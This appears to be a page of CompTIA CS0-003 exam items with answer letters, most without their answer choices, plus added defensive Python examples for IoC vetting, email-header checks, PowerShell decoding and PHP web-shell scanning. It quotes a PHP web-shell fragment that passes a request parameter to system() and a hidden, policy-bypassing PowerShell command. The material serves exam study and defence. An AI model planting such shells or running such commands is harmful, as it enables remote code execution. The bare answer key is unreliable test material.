CompTIA's CS0-003 Which of the following documents sets requirements and metrics for a third-party response during an event?
#301
Answer: C
CompTIA's CS0-003 A SOC analyst wants to improve the proactive detection of malicious emails before they are delivered to the destination inbox. Which of the following is the best approach the SOC analyst can recommend?
#302
Answer: B
CompTIA's CS0-003 Which of the following is a benefit of the Diamond Model of Intrusion Analysis?
#303
Answer: A
CompTIA's CS0-003 An incident responder was able to recover a binary file through the network traffic. The binary file was also found in some machines with anomalous behavior. Which of the following processes most likely can be performed to understand the purpose of the binary file?
#304
Answer: C
CompTIA's CS0-003 A manufacturing company’s assembly line machinery only functions on an end-of-life OS. Consequently, no patches exist for several highly exploitable OS vulnerabilities. Which of the following is the best mitigating control to reduce the risk of these current conditions?
#305
Answer: A
CompTIA's CS0-003 Which of the following will most likely cause severe issues with authentication and logging?
#306
Answer: D
CompTIA's CS0-003 Several critical bugs were identified during a vulnerability scan. The SLA risk requirement is that all critical vulnerabilities should be patched within 24 hours. After sending a notification to the asset owners, the patch cannot be deployed due to planned, routine system upgrades. Which of the following is the best method to remediate the bugs?
#307
Answer: A
CompTIA's CS0-003 A company is in the middle of an incident, and customer data has been breached. Which of the following should the company contact first?
#308
Answer: D
CompTIA's CS0-003 A list of IoCs released by a government security organization contains the SHA-256 hash for a Microsoft-signed legitimate binary, svchost.exe. Which of the following best describes the result if security teams add this indicator to their detection signatures?
#309
Answer: A
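The practical consequence of loading a hash for a Microsoft-signed system binary into a detection rule is that every Windows host matches it, so the rule fires fleet-wide on legitimate files. The following added example (not code from the page or from any IoC feed) shows the check a detection engineer would run before deployment: vet incoming hash indicators against a known-good hash set built from a clean reference image, and compare how many hosts alert before and after vetting. All file contents, paths, host names and hashes are constructed stand-ins; no real svchost.exe hash appears here.

```python
import hashlib
from typing import Dict, List, Set, Tuple


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


# Constructed stand-in file contents. The hashes derived below are hashes of
# these byte strings, not the real hash of any Windows binary.
GOLDEN_IMAGE: Dict[str, bytes] = {
    r"C:\Windows\System32\svchost.exe": b"stand-in for the Microsoft-signed svchost.exe",
    r"C:\Windows\System32\notepad.exe": b"stand-in for notepad.exe",
}
DROPPER = b"stand-in for the malicious dropper an advisory would describe"

# The feed as received: one genuine indicator plus the legitimate svchost.exe hash.
IOC_FEED: List[str] = [
    sha256_hex(DROPPER),
    sha256_hex(GOLDEN_IMAGE[r"C:\Windows\System32\svchost.exe"]),
]


def known_good_hashes(image: Dict[str, bytes]) -> Set[str]:
    """Hash every file in a clean reference build (stand-in for NSRL or a vendor catalog)."""
    return {sha256_hex(content) for content in image.values()}


def vet_indicators(feed: List[str], known_good: Set[str]) -> Tuple[Set[str], Set[str]]:
    """Split a hash feed into deployable indicators and ones that collide with known-good files."""
    deployable = {h for h in feed if h not in known_good}
    rejected = set(feed) - deployable
    return deployable, rejected


def scan_host(files: Dict[str, bytes], indicators: Set[str]) -> List[str]:
    """Return the paths on one host whose SHA-256 matches an indicator."""
    return sorted(path for path, content in files.items() if sha256_hex(content) in indicators)


def build_fleet() -> Dict[str, Dict[str, bytes]]:
    """Constructed fleet: three clean hosts plus one that also carries the dropper."""
    fleet = {f"host{i}": dict(GOLDEN_IMAGE) for i in range(1, 4)}
    fleet["host4"] = {**GOLDEN_IMAGE, r"C:\Users\Public\update.exe": DROPPER}
    return fleet


def hosts_alerting(indicators: Set[str]) -> List[str]:
    """Names of hosts on which at least one file matches the indicator set."""
    return sorted(host for host, files in build_fleet().items() if scan_host(files, indicators))


if __name__ == "__main__":
    print("raw feed alerts on:", hosts_alerting(set(IOC_FEED)))
    deployable, rejected = vet_indicators(IOC_FEED, known_good_hashes(GOLDEN_IMAGE))
    print("vetted feed alerts on:", hosts_alerting(deployable), "rejected indicators:", len(rejected))
```

With the raw feed all four hosts alert because each carries the reference svchost.exe; after vetting, only the host with the dropper does. In production the known-good set would come from a trusted source such as the vendor's signed-file catalog rather than from a hand-built image.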
CompTIA's CS0-003 A Chief Information Security Officer wants to lock down the users’ ability to change applications that are installed on their Windows systems. Which of the following is the best enterprise-level solution?
#310
Answer: B
CompTIA's CS0-003 An employee received a phishing email that contained malware targeting the company. Which of the following is the best way for a security analyst to get more details about the malware and avoid disclosing information?
#311
Answer: D
CompTIA's CS0-003 A Chief Finance Officer receives an email from someone who is possibly impersonating the company’s Chief Executive Officer and requesting a financial operation. Which of the following should an analyst use to verify whether the email is an impersonation attempt?
#312
Answer: D
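The verification an analyst performs on a suspected CEO-impersonation email is header analysis: compare the From: domain with Reply-To: and Return-Path:, and read the receiving server's Authentication-Results for SPF, DKIM and DMARC outcomes. The example below is added here and is not code from the page; the raw message, the example.com / example.net domains and the authserv-id mx.example.com are constructed to resemble what a receiving MTA stamps, and the findings are indicators for the analyst to weigh, not proof on their own (mailing lists and bulk senders legitimately produce Return-Path mismatches).

```python
import email
from email import policy
from email.utils import parseaddr
from typing import Dict, List

# Constructed raw message (not from the page): From: claims the company's domain, but
# authentication failed and the Reply-To: points at an outside domain.
SAMPLE_RAW = """\
Return-Path: <bounce@mail-relay.example.net>
Authentication-Results: mx.example.com; spf=fail smtp.mailfrom=mail-relay.example.net; dkim=none; dmarc=fail header.from=example.com
From: "Pat Chief, CEO" <ceo@example.com>
Reply-To: ceo.example@example.net
To: cfo@example.com
Subject: Urgent wire transfer

Please process the attached payment today and keep it confidential.
"""

# Constructed clean message for comparison: aligned domains, all checks pass.
CLEAN_RAW = """\
Return-Path: <ceo@example.com>
Authentication-Results: mx.example.com; spf=pass smtp.mailfrom=example.com; dkim=pass header.d=example.com; dmarc=pass header.from=example.com
From: ceo@example.com
To: cfo@example.com
Subject: Lunch

See you at noon.
"""


def parse_auth_results(value: str) -> Dict[str, str]:
    """Reduce an Authentication-Results header to {method: result}, e.g. {'spf': 'fail'}."""
    results: Dict[str, str] = {}
    for clause in value.split(";")[1:]:  # clause 0 is the authserv-id, not a result
        clause = clause.strip()
        if "=" in clause:
            method, rest = clause.split("=", 1)
            results[method.strip().lower()] = rest.split()[0].strip().lower()
    return results


def _domain(addr: str) -> str:
    return addr.rpartition("@")[2].lower()


def impersonation_indicators(raw: str) -> List[str]:
    """Return human-readable indicators that the message is not what its From: claims."""
    msg = email.message_from_string(raw, policy=policy.default)
    findings: List[str] = []
    from_domain = _domain(parseaddr(str(msg.get("From", "")))[1])

    reply_to = parseaddr(str(msg.get("Reply-To", "")))[1]
    if reply_to and _domain(reply_to) != from_domain:
        findings.append(f"Reply-To domain differs from From domain ({reply_to})")

    return_path = parseaddr(str(msg.get("Return-Path", "")))[1]
    if return_path and _domain(return_path) != from_domain:
        findings.append(f"Return-Path domain differs from From domain ({return_path})")

    auth = parse_auth_results(str(msg.get("Authentication-Results", "")))
    for method in ("spf", "dkim", "dmarc"):
        if auth.get(method) != "pass":
            findings.append(f"{method} did not pass ({auth.get(method, 'missing')})")
    return findings


if __name__ == "__main__":
    for line in impersonation_indicators(SAMPLE_RAW):
        print("-", line)
```

Only the Authentication-Results header added by the organisation's own inbound gateway should be trusted; a sender can forge that header too, so real tooling matches the authserv-id against the gateway's name before using it.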
CompTIA's CS0-003 An analyst is investigating a phishing incident and has retrieved the following as part of the investigation:
cmd.exe /c c:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -EncodedCommand
Which of the following should the analyst use to gather more information about the purpose of this command?
#313
Answer: A
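The -EncodedCommand argument is not obfuscation in any strong sense: powershell.exe takes the script text as UTF-16LE and Base64-encodes it, so the analyst recovers the script by reversing those two steps. The example below is added here and is not code from the page; the page does not show the incident's Base64 blob, so the block encodes a harmless constructed command and decodes it again. It also pulls the blob out of a full command line, allowing for the abbreviated switch spellings (-e, -ec, -enc) that powershell.exe accepts.

```python
import base64
from typing import Optional

# Constructed sample script; the incident's real payload is not on the page.
SAMPLE_COMMAND = "Get-Process | Where-Object { $_.CPU -gt 100 }"


def encode_powershell_command(command: str) -> str:
    """Encode text the way powershell.exe -EncodedCommand expects: UTF-16LE, then Base64."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def decode_powershell_command(blob: str) -> str:
    """Reverse the encoding. Raises ValueError on a blob that is not Base64 or not UTF-16LE."""
    raw = base64.b64decode(blob, validate=True)
    if len(raw) % 2:
        raise ValueError("decoded length is odd, so this is not UTF-16LE text")
    return raw.decode("utf-16-le")


def extract_encoded_argument(cmdline: str) -> Optional[str]:
    """Return the token that follows the encoded-command switch, or None if it is absent.

    powershell.exe accepts -EncodedCommand, the documented aliases -e and -ec, and any
    unambiguous prefix such as -enc, so match on prefix rather than the full spelling.
    (-ExecutionPolicy is not a prefix of -encodedcommand and is therefore skipped.)
    """
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        low = tok.lower()
        if len(low) >= 2 and (low == "-ec" or "-encodedcommand".startswith(low)):
            return tokens[i + 1]
    return None


def decode_from_cmdline(cmdline: str) -> Optional[str]:
    """Convenience wrapper: decoded script text, or None when no encoded switch is present."""
    blob = extract_encoded_argument(cmdline)
    return decode_powershell_command(blob) if blob else None


if __name__ == "__main__":
    sample = ("cmd.exe /c powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass "
              "-NoLogo -NoProfile -EncodedCommand " + encode_powershell_command(SAMPLE_COMMAND))
    print(decode_from_cmdline(sample))
```

Decoded output is frequently a second stage (for example a download cradle or another nested -EncodedCommand), so the same function is typically applied repeatedly until plain script text appears.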
CompTIA's CS0-003 An organization’s threat intelligence team notes a recent trend in adversary privilege escalation procedures. Multiple threat groups have been observed utilizing native Windows tools to bypass system controls and execute commands with privileged credentials. Which of the following controls would be most effective to reduce the rate of success of such attempts?
#314
Answer: C
CompTIA's CS0-003 When undertaking a cloud migration of multiple SaaS applications, an organization’s systems administrators struggled with the complexity of extending identity and access management to cloud-based assets. Which of the following service models would have reduced the complexity of this project?
#315
Answer: A
CompTIA's CS0-003 A security analyst reviews the following results of a Nikto scan: Which of the following should the security administrator investigate next?
#316
Answer: B
CompTIA's CS0-003 Which of the following explains the importance of a timeline when providing an incident response report?
#317
Answer: C
CompTIA's CS0-003 An auditor is reviewing an evidence log associated with a cyber crime. The auditor notices that a gap exists between individuals who were responsible for holding onto and transferring the evidence between individuals responsible for the investigation. Which of the following best describes the evidence handling process that was not properly followed?
#318
Answer: D
CompTIA's CS0-003 A security analyst is assisting a software engineer with the development of a custom log collection and alerting tool (SIEM) for a proprietary system. The analyst is concerned that the tool will not detect known attacks and behavioral IoCs. Which of the following should be configured in order to resolve this issue?
#319
Answer: C
CompTIA's CS0-003 Which of the following responsibilities does the legal team have during an incident management event? (Choose two.)
E. Conduct computer and network damage assessments for insurance.
F. Verify that all security personnel have the appropriate clearances.
#320
Answer: B
CompTIA's CS0-003 Which of the following characteristics ensures the security of an automated information system is the most effective and economical?
#321
Answer: A
CompTIA's CS0-003 Which of the following is the most likely reason for an organization to assign different internal departmental groups during the post-incident analysis and improvement process?
#322
Answer: A
CompTIA's CS0-003 An analyst has discovered the following suspicious command:
"; $xyz = ($_REQUEST['xyz']); system($xyz); echo ""; die; }?>
Which of the following would best describe the outcome of the command?
#323
Answer: C
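The fragment above is the core of a PHP web shell: whatever arrives in the xyz request parameter is handed straight to system(), so any HTTP client can run operating-system commands as the web server user. A practitioner who finds one such fragment usually wants to sweep the rest of the web root for the same request-to-exec pattern. The following scanner is an added example, not code from the page: it is a line-oriented, single-file taint check (a superglobal assigned to a variable that later reaches an exec sink on the same or a later line), and the two PHP sources it runs over are constructed to mirror the question's fragment and a benign page.

```python
import re
from typing import List, Tuple

# Constructed PHP sources (not from the page). One benign, one carrying the
# request-parameter-to-system() pattern quoted in the question.
BENIGN_PHP = """<?php
$name = htmlspecialchars($_GET['name'] ?? '');
echo "Hello, $name";
?>"""

WEBSHELL_PHP = """<?php
if (isset($_REQUEST['xyz'])) { echo "<pre>"; $xyz = ($_REQUEST['xyz']); system($xyz); echo "</pre>"; die; }
?>"""

# Functions that execute their argument, and the superglobals an attacker controls.
EXEC_SINKS = ("system", "exec", "shell_exec", "passthru", "popen", "proc_open", "eval", "assert")
REQUEST_SOURCES = ("$_REQUEST", "$_GET", "$_POST", "$_COOKIE")

SINK_RE = re.compile(r"\b(" + "|".join(EXEC_SINKS) + r")\s*\(\s*([^)]*)\)")
ASSIGN_RE = re.compile(r"(\$\w+)\s*=\s*\(?\s*(\$_(?:REQUEST|GET|POST|COOKIE)\[[^\]]*\])")
FIRST_VAR_RE = re.compile(r"\$_?\w+")


def find_exec_from_request(src: str) -> List[Tuple[int, str, str]]:
    """Return (line_no, sink, argument) for each exec sink fed directly by a request
    superglobal or by a variable assigned from one earlier in the file."""
    tainted = set()
    hits: List[Tuple[int, str, str]] = []
    for lineno, line in enumerate(src.splitlines(), 1):
        # Record assignments first so `$x = $_REQUEST[..]; system($x);` on one line is caught.
        for var, _source in ASSIGN_RE.findall(line):
            tainted.add(var)
        for sink, arg in SINK_RE.findall(line):
            arg = arg.strip()
            first = FIRST_VAR_RE.match(arg)
            if first and (first.group() in REQUEST_SOURCES or first.group() in tainted):
                hits.append((lineno, sink, arg))
    return hits


def scan_files(files: dict) -> dict:
    """Map each file name to its hits, dropping files with none."""
    return {name: hits for name, src in files.items() if (hits := find_exec_from_request(src))}


if __name__ == "__main__":
    for name, hits in scan_files({"index.php": BENIGN_PHP, "cache.php": WEBSHELL_PHP}).items():
        for lineno, sink, arg in hits:
            print(f"{name}:{lineno}: {sink}({arg})")
```

This is a triage aid rather than a full taint analysis: it will miss data that passes through string concatenation or a function call before reaching the sink, and a proper review should follow up with a PHP static-analysis tool and with the web server's access logs for requests carrying the xyz parameter.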
CompTIA's CS0-003 A company classifies security groups by risk level. Any group with a high-risk classification requires multiple levels of approval for member or owner changes. Which of the following inhibitors to remediation is the company utilizing?
#324
Answer: A
CompTIA's CS0-003 Which of the following attributes is part of the Diamond Model of Intrusion Analysis?
#325
Answer: D
CompTIA's CS0-003 An analyst is creating the final vulnerability report for one of the company’s customers. The customer asks for a scanning profile with a CVSS score of 7 or higher. The analyst has confirmed there is no finding for missing database patches, even if false positives have been eliminated by manual checks. Which of the following is the most probable reason for the missing scan result?
#326
Answer: C
CompTIA's CS0-003 Which of the following is the best framework for assessing how attackers use techniques over an infrastructure to exploit a target’s information assets?
#327
Answer: D
CompTIA's CS0-003 A security analyst is improving an organization’s vulnerability management program. The analyst cross-checks the current reports with the system’s infrastructure teams, but the reports do not accurately reflect the current patching levels. Which of the following will most likely correct the report errors?
#328
Answer: C
CompTIA's CS0-003 A threat intelligence analyst is updating a document according to the MITRE ATT&CK framework. The analyst detects the following behavior from a malicious actor: "The malicious actor will attempt to achieve unauthorized access to the vulnerable system." In which of the following phases should the analyst include the detection?
#329
Answer: C
CompTIA's CS0-003 An analyst receives alerts that state the following traffic was identified on the perimeter network firewall: Which of the following best describes the indicator of compromise that triggered the alerts?